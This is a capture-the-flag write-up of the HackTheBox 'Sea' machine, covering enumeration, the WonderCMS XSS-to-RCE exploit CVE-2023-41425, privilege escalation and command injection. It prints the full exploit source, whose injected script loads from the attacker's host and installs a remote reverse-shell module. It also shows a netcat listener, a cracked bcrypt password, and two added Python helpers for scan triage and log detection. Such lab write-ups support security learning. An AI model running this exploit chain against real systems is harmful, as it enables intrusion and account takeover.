HackTheBox-Machines Sea Writeup

kazma Security Researcher

Exploitation

Let's start with an nmap scan:

└─$ nmap -sV 10.10.11.28
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-15 00:29 CST
Nmap scan report for 10.10.11.28
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.39 seconds

Ports 22 and 80 are open.
whatweb did not reveal a hostname, but browsing the site I saw http://sea.htb/contact.php, so add the hostname to /etc/hosts:

└──╼ [★]$ echo "10.10.11.28 sea.htb" | sudo tee -a /etc/hosts 
10.10.11.28 sea.htb

Now scan for paths:

└──╼ [★]$ ffuf -u http://sea.htb/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://sea.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

# Priority ordered case sensative list, where entries were found [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 94ms]
# [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 95ms]
# directory-list-2.3-medium.txt [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 96ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 191ms]
# [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 285ms]
# Copyright 2007 James Fisher [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 328ms]
# [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 378ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 422ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 516ms]
0 [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 93ms]
themes [Status: 301, Size: 230, Words: 14, Lines: 8, Duration: 93ms]
# [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 941ms]
data [Status: 301, Size: 228, Words: 14, Lines: 8, Duration: 93ms]
[Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 3404ms]
home [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 3404ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 3404ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 2335ms]
# on atleast 2 different hosts [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 3502ms]
plugins [Status: 301, Size: 231, Words: 14, Lines: 8, Duration: 92ms]
messages [Status: 301, Size: 232, Words: 14, Lines: 8, Duration: 92ms]
404 [Status: 200, Size: 3341, Words: 530, Lines: 85, Duration: 93ms]
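
Most of the hits in this scan are the wordlist's own comment lines and the 3650-byte index page that the server returns for anything unknown. As an added example (not from the writeup), the following Python parses ffuf's default output, derives the server's catch-all signature from those impossible paths, and keeps only the real findings; the sample output is constructed from the run above.

```python
import re

# Constructed sample modelled on the ffuf run above: wordlist comment lines and
# junk paths that still return the 3650-byte index page, plus real directories.
SAMPLE_FFUF_OUTPUT = """\
# Priority ordered case sensative list, where entries were found [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 94ms]
# Copyright 2007 James Fisher [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 328ms]
0 [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 93ms]
themes [Status: 301, Size: 230, Words: 14, Lines: 8, Duration: 93ms]
data [Status: 301, Size: 228, Words: 14, Lines: 8, Duration: 93ms]
[Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 3404ms]
home [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 3404ms]
plugins [Status: 301, Size: 231, Words: 14, Lines: 8, Duration: 92ms]
messages [Status: 301, Size: 232, Words: 14, Lines: 8, Duration: 92ms]
404 [Status: 200, Size: 3341, Words: 530, Lines: 85, Duration: 93ms]
"""

HIT_RE = re.compile(
    r"^(?P<path>.*?)\s*\[Status: (?P<status>\d+), Size: (?P<size>\d+), "
    r"Words: (?P<words>\d+), Lines: (?P<lines>\d+), Duration: (?P<ms>\d+)ms\]$"
)


def parse_ffuf(text):
    """Turn ffuf's default output into dicts; banner and config lines are skipped."""
    hits = []
    for line in text.splitlines():
        m = HIT_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            for key in ("status", "size", "words", "lines", "ms"):
                rec[key] = int(rec[key])
            hits.append(rec)
    return hits


def triage(hits):
    """Separate real findings from catch-all noise.

    Wordlist comment lines ('# ...') and the empty line can never be real paths,
    so the (status, size) pairs they produce are the server's catch-all
    signature; any other path with the same signature is just the index page
    served again (here 'home' and '0' at 200/3650) and is dropped."""
    junk = [h for h in hits if not h["path"] or h["path"].startswith("#")]
    catchall = {(h["status"], h["size"]) for h in junk}
    keep = [h for h in hits
            if h not in junk and (h["status"], h["size"]) not in catchall]
    return keep, catchall


def ffuf_filter_arg(catchall):
    """Build the -fs argument that would drop the same noise on a re-run."""
    sizes = sorted({size for _, size in catchall})
    return "-fs " + ",".join(str(s) for s in sizes)
```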

Some paths redirect; let's scan one level deeper:

└──╼ [★]$ ffuf -u http://sea.htb/themes/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://sea.htb/themes/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

404 [Status: 200, Size: 3341, Words: 530, Lines: 85, Duration: 92ms]
%20 [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 92ms]
bike [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 111ms]
video games [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 96ms]
spyware doctor [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 92ms]
4%20Color%2099%20IT2 [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 93ms]

bike redirects, so scan deeper again:

└──╼ [★]$ ffuf -u http://sea.htb/themes/bike/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://sea.htb/themes/bike/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

img [Status: 301, Size: 239, Words: 14, Lines: 8, Duration: 94ms]
[Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 94ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 95ms]
# Priority ordered case sensative list, where entries were found [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 95ms]
home [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 95ms]
# [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 788ms]
# [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 1791ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 1791ms]
version [Status: 200, Size: 6, Words: 1, Lines: 2, Duration: 93ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 2792ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 2794ms]
# on atleast 2 different hosts [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 3796ms]
# This work is licensed under the Creative Commons [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 3797ms]
# directory-list-2.3-medium.txt [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 3801ms]
# Copyright 2007 James Fisher [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 3802ms]
# [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 3805ms]
css [Status: 301, Size: 239, Words: 14, Lines: 8, Duration: 93ms]
# [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 4804ms]
summary [Status: 200, Size: 66, Words: 9, Lines: 2, Duration: 92ms]
404 [Status: 200, Size: 3341, Words: 530, Lines: 85, Duration: 93ms]
LICENSE [Status: 200, Size: 1067, Words: 152, Lines: 22, Duration: 98ms]
%20 [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 98ms]
video games [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 96ms]
spyware doctor [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 95ms]
4%20Color%2099%20IT2 [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 96ms]
nero 7 [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 93ms]
cell phones [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 93ms]

Promising. Visiting summary and LICENSE shows:
[screenshot: summary]
[screenshot: mit]
This made me suspect there are other git-related paths under this directory, so I opened Burp to make manual testing easier. The result:
[screenshot: readme]
Found README.md…
A quick search for what WonderCMS is:

WonderCMS is an extremely small flat file CMS. It’s fast, responsive and doesn’t require any configuration. It provides a simple way for creating and editing websites.

It looks like a lightweight CMS. To look for exploitable CVEs in WonderCMS, I re-ran ffuf to collect the useful information and found version:

└──╼ [★]$ ffuf -u http://sea.htb/themes/bike/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | grep "Status: 200"

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://sea.htb/themes/bike/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

summary [Status: 200, Size: 66, Words: 9, Lines: 2, Duration: 92ms]
version [Status: 200, Size: 6, Words: 1, Lines: 2, Duration: 4979ms]
404 [Status: 200, Size: 3341, Words: 530, Lines: 85, Duration: 97ms]
LICENSE [Status: 200, Size: 1067, Words: 152, Lines: 22, Duration: 93ms]
[WARN] Caught keyboard interrupt (Ctrl-C)

The version is 3.2.0:

1
2
└──╼ [★]$ curl http://sea.htb/themes/bike/version
3.2.0

Related exploit:
https://github.com/prodigiousMind/CVE-2023-41425

└──╼ [★]$ python3 exploit.py 
usage: python3 exploit.py loginURL IP_Address Port
example: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252
┌─[sg-vip-1]─[10.10.14.11]─[kazma@htb-dcoyyfmrg1]─[~/CVE-2023-41425]
└──╼ [★]$ python3 exploit.py http://sea.htb/themes/ 10.10.14.11 4444
[+] xss.js is created
[+] execute the below command in another terminal

----------------------------
nc -lvp 4444
----------------------------

send the below link to admin:

----------------------------
http://sea.htb/themes/"></form><script+src="http://10.10.14.11:8000/xss.js"></script><form+action="
----------------------------


starting HTTP server to allow the access to xss.js
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

The GitHub README.md describes it as a one-click RCE, so let's look at the exploit and simulate that click:

└──╼ [★]$ cat exploit.py 
# Author: prodigiousMind
# Exploit: Wondercms 4.3.2 XSS to RCE


import sys
import requests
import os
import bs4

if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")
else:
    data = '''
var url = "'''+str(sys.argv[1])+'''";
if (url.endsWith("/")) {
    url = url.slice(0, -1);
}
var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = new URL(urlWithoutLog).pathname;
var token = document.querySelectorAll('[name="token"]')[0].value;
var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token;
var xhr3 = new XMLHttpRequest();
xhr3.withCredentials = true;
xhr3.open("GET", urlRev);
xhr3.send();
xhr3.onload = function() {
    if (xhr3.status == 200) {
        var xhr4 = new XMLHttpRequest();
        xhr4.withCredentials = true;
        xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");
        xhr4.send();
        xhr4.onload = function() {
            if (xhr4.status == 200) {
                var ip = "'''+str(sys.argv[2])+'''";
                var port = "'''+str(sys.argv[3])+'''";
                var xhr5 = new XMLHttpRequest();
                xhr5.withCredentials = true;
                xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);
                xhr5.send();

            }
        };
    }
};
'''
    try:
        open("xss.js","w").write(data)
        print("[+] xss.js is created")
        print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))
        print("----------------------------\n")
        XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""
        XSSlink = XSSlink.strip(" ")
        print("send the below link to admin:\n\n----------------------------\n"+XSSlink)
        print("----------------------------\n")

        print("\nstarting HTTP server to allow the access to xss.js")
        os.system("python3 -m http.server\n")
    except: print(data,"\n","//write this to a file")
┌─[sg-vip-1]─[10.10.14.11]─[kazma@htb-dcoyyfmrg1]─[~/CVE-2023-41425]
└──╼ [★]$ curl 'http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.11&lport=4444'

Successfully got a reverse shell:

└──╼ [★]$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.28] 59906
Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
05:16:31 up 12:48, 0 users, load average: 1.05, 0.80, 0.77
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

As before, digging into the database below turns up a password:

www-data@sea:/var/www/sea/data$ cat database.js | grep password
cat database.js | grep password
"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",

Asked ChatGPT and learned it's bcrypt, which we can crack with hashcat:

└─$ echo -n '$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q' > hash.txt

┌──(kazma㉿kali)-[~]
└─$ hashcat -m 3200 -a 0 -o output.txt hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i5-12400, 2918/5901 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec


Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM...DnXm4q
Time.Started.....: Thu Aug 15 14:53:15 2024 (20 secs)
Time.Estimated...: Thu Aug 15 14:53:35 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 151 H/s (6.55ms) @ Accel:8 Loops:16 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3072/14344385 (0.02%)
Rejected.........: 0/3072 (0.00%)
Restore.Point....: 3008/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1008-1024
Candidate.Engine.: Device Generator
Candidates.#1....: blessing -> dangerous

Started: Thu Aug 15 14:52:49 2024
Stopped: Thu Aug 15 14:53:37 2024

The result is in output.txt:

└─$ cat output.txt
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q:mychemicalromance

The password is mychemicalromance

www-data@sea:/var/www/sea/data$ su amay 
su amay
Password: mychemicalromance

amay@sea:/var/www/sea/data$ cat /home/amay/user.txt
cat /home/amay/user.txt
6f5a0978cb9ab...

Got user…
After poking around twice without finding a privesc route, I consulted online solutions and looked at the services currently running locally:

amay@sea:~$ netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:45763 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -

There are other local services, for example on port 8080. We can forward that traffic to our port 48763 as below and see what the web service looks like:

└──╼ [★]$ ssh -L 48763:localhost:8080 [email protected]
The authenticity of host '10.10.11.28 (10.10.11.28)' can't be established.
ED25519 key fingerprint is SHA256:xC5wFVdcixOCmr5pOw8Tm4AajGSMT3j5Q4wL6/ZQg7A.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.28' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-190-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Thu 15 Aug 2024 08:29:06 AM UTC

System load: 0.42 Processes: 259
Usage of /: 73.9% of 6.51GB Users logged in: 1
Memory usage: 22% IPv4 address for eth0: 10.10.11.28
Swap usage: 0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Aug 15 08:00:42 2024 from 10.10.14.11
amay@sea:~$

Opening port 48763 in our local browser shows a login page:
[screenshot: login]
Entering the only set of credentials we know so far logs us in:
[screenshot: log]
Inside is a system monitor page. Clicking Analyze prints the contents of access.log, so we try, through Burp, whether we can read /root/root.txt:
[screenshot: sus]
The response says there is no suspicious traffic, so it prints nothing.
Since the access log showed our earlier ffuf requests, which apparently get treated as malicious, after some blind testing I found that cutting the command short and appending ffuf gets it classified as suspicious traffic:
[screenshot: root]
And just like that, got the root flag…
I originally thought it was checking the file's contents; I didn't expect appending the command to work as well.
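
The system monitor above is looking for traces of exactly this attack chain in access.log. As an added example that is not part of the writeup or of WonderCMS, this Python classifies Apache combined-log lines by the artifacts each stage leaves (ffuf's default User-Agent, assumed here, the injected form/script markup, a module install from a foreign host, and lhost/lport parameters on a theme PHP file); the log lines and the token value are constructed.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed Apache combined-log lines modelled on this writeup's activity:
# the ffuf enumeration (ffuf's default User-Agent is assumed), the XSS link the
# exploit printed, the module install it triggers, and the rev.php call.
SAMPLE_ACCESS_LOG = """\
10.10.14.11 - - [15/Aug/2024:00:31:02 +0000] "GET /themes/bike/version HTTP/1.1" 200 6 "-" "Fuzz Faster U Fool v2.1.0-dev"
10.10.14.11 - - [15/Aug/2024:00:31:02 +0000] "GET /themes/bike/summary HTTP/1.1" 200 66 "-" "Fuzz Faster U Fool v2.1.0-dev"
10.10.14.11 - - [15/Aug/2024:00:31:03 +0000] "GET /themes/bike/LICENSE HTTP/1.1" 200 1067 "-" "Fuzz Faster U Fool v2.1.0-dev"
10.10.14.11 - - [15/Aug/2024:05:10:40 +0000] "GET /themes/%22%3E%3C/form%3E%3Cscript+src=%22http://10.10.14.11:8000/xss.js%22%3E%3C/script%3E%3Cform+action=%22 HTTP/1.1" 200 3650 "-" "Mozilla/5.0"
127.0.0.1 - - [15/Aug/2024:05:11:05 +0000] "GET /?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=TOKEN HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
10.10.14.11 - - [15/Aug/2024:05:16:31 +0000] "GET /themes/revshell-main/rev.php?lhost=10.10.14.11&lport=4444 HTTP/1.1" 200 0 "-" "curl/8.5.0"
10.10.14.20 - - [15/Aug/2024:06:00:00 +0000] "GET /home HTTP/1.1" 200 3650 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
SCANNER_UA = ("fuzz faster u fool", "dirbuster", "gobuster", "feroxbuster")


def parse_log(text):
    return [m.groupdict() for m in map(LOG_RE.match, text.splitlines()) if m]


def classify(entry, site_host="sea.htb"):
    """Tags for one request, each tied to a step of the attack chain above."""
    tags = []
    target = unquote_plus(entry["target"])
    parts = urlsplit(target)
    qs = parse_qs(parts.query)
    if any(s in entry["ua"].lower() for s in SCANNER_UA):
        tags.append("scanner-ua")
    if re.search(r"<script|</form>|javascript:", target, re.I):
        tags.append("xss-in-url")          # the injected form/script markup
    for url in qs.get("installModule", []):
        if urlsplit(url).hostname not in (None, site_host):
            tags.append("remote-module-install")   # theme fetched from elsewhere
    if parts.path.endswith(".php") and {"lhost", "lport"}.issubset(qs):
        tags.append("reverse-shell-params")
    return tags


def analyze(text, burst=3):
    """Per-IP tag sets; 'burst' marks an IP with >= burst requests in one minute,
    the pattern a ffuf run leaves in the log."""
    report = defaultdict(set)
    per_minute = Counter()
    for entry in parse_log(text):
        report[entry["ip"]].update(classify(entry))
        per_minute[(entry["ip"], entry["ts"][:17])] += 1   # ts[:17] = dd/Mon/yyyy:HH:MM
    for (ip, _), n in per_minute.items():
        if n >= burst:
            report[ip].add("burst")
    return {ip: sorted(tags) for ip, tags in report.items() if tags}
```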

Reference

https://medium.com/@haroonharoon17/sea-hack-the-box-walk-through-77b1030ce0bc
https://natro92.fun/posts/211ccf29/#%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F-%E6%9D%83%E9%99%90%E5%80%9F%E7%94%A8

Pwned !!!


  • Title: HackTheBox-Machines Sea Writeup
  • Author: kazma
  • Created at : 2024-08-15 00:23:38
  • Updated at : 2025-08-20 13:53:24
  • Link: https://kazma.tw/2024/08/15/HackTheBox-Machines-Sea-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.